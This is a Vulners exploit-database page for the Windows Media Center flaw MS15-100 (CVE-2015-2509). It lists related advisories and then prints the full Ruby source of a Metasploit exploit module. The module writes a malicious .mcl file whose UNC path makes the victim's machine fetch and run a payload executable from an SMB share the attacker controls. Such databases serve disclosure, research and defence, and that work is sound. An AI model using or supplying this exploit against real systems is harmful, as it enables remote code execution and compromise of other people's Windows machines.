Vulners
Lucene search
Microsoft Windows Media Center - MCL (MS15-100) (Metasploit)
| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
 | Windows Media Center - Command Execution (MS15-100) Vulnerability | 12 Sep 201500:00 | – | zdt |
| Microsoft Windows Media Center MCL MS15-100 Vulnerability | 16 Sep 201500:00 | – | zdt |
 | CVE-2015-2509 | 15 Sep 201500:00 | – | circl |
 | Microsoft Windows Media Center RCE Vulnerability | 10 Sep 201500:00 | – | cnvd |
 | Microsoft Windows Media Center Remote Code Execution (MS15-100: CVE-2015-2509) | 8 Sep 201500:00 | – | checkpoint_advisories |
 | CVE-2015-2509 | 9 Sep 201500:00 | – | cve |
 | CVE-2015-2509 | 9 Sep 201500:00 | – | cvelist |
 | KLA10656 Multiple vulnerabilities in Microsoft Windows | 8 Sep 201500:00 | – | kaspersky |
| KLA10660Code execution vulnerability in Microsoft Windows Media Center | 8 Sep 201500:00 | – | kaspersky |
 | Immunity Canvas: MS15_100 | 9 Sep 201500:59 | – | canvas |
10
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
include Msf::Exploit::Remote::SMB::Server::Share
def initialize(info={})
super(update_info(info,
'Name' => "MS15-100 Microsoft Windows Media Center MCL Vulnerability",
'Description' => %q{
This module exploits a vulnerability in Windows Media Center. By supplying
an UNC path in the *.mcl file, a remote file will be automatically downloaded,
which can result in arbitrary code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r',
],
'References' =>
[
['CVE', '2015-2509'],
['MSB', 'MS15-100']
],
'Payload' =>
{
'DisableNops' => true
},
'DefaultOptions' =>
{
'DisablePayloadHandler' => 'false'
},
'Platform' => 'win',
'Targets' =>
[
['Windows', {}],
],
'Privileged' => false,
'DisclosureDate' => "Sep 8 2015",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']),
OptString.new('FILE_NAME', [ false, 'The name of the malicious payload to execute', 'msf.exe'])
], self.class)
deregister_options('FILE_CONTENTS')
end
def generate_mcl
%Q|<application run="#{unc}" />|
end
def primer
self.file_contents = generate_payload_exe
print_status("Malicious executable at #{unc}...")
print_status("Creating '#{datastore['FILENAME']}' file ...")
mcl = generate_mcl
file_create(mcl)
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Sep 2015 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 29.3
EPSS0.87937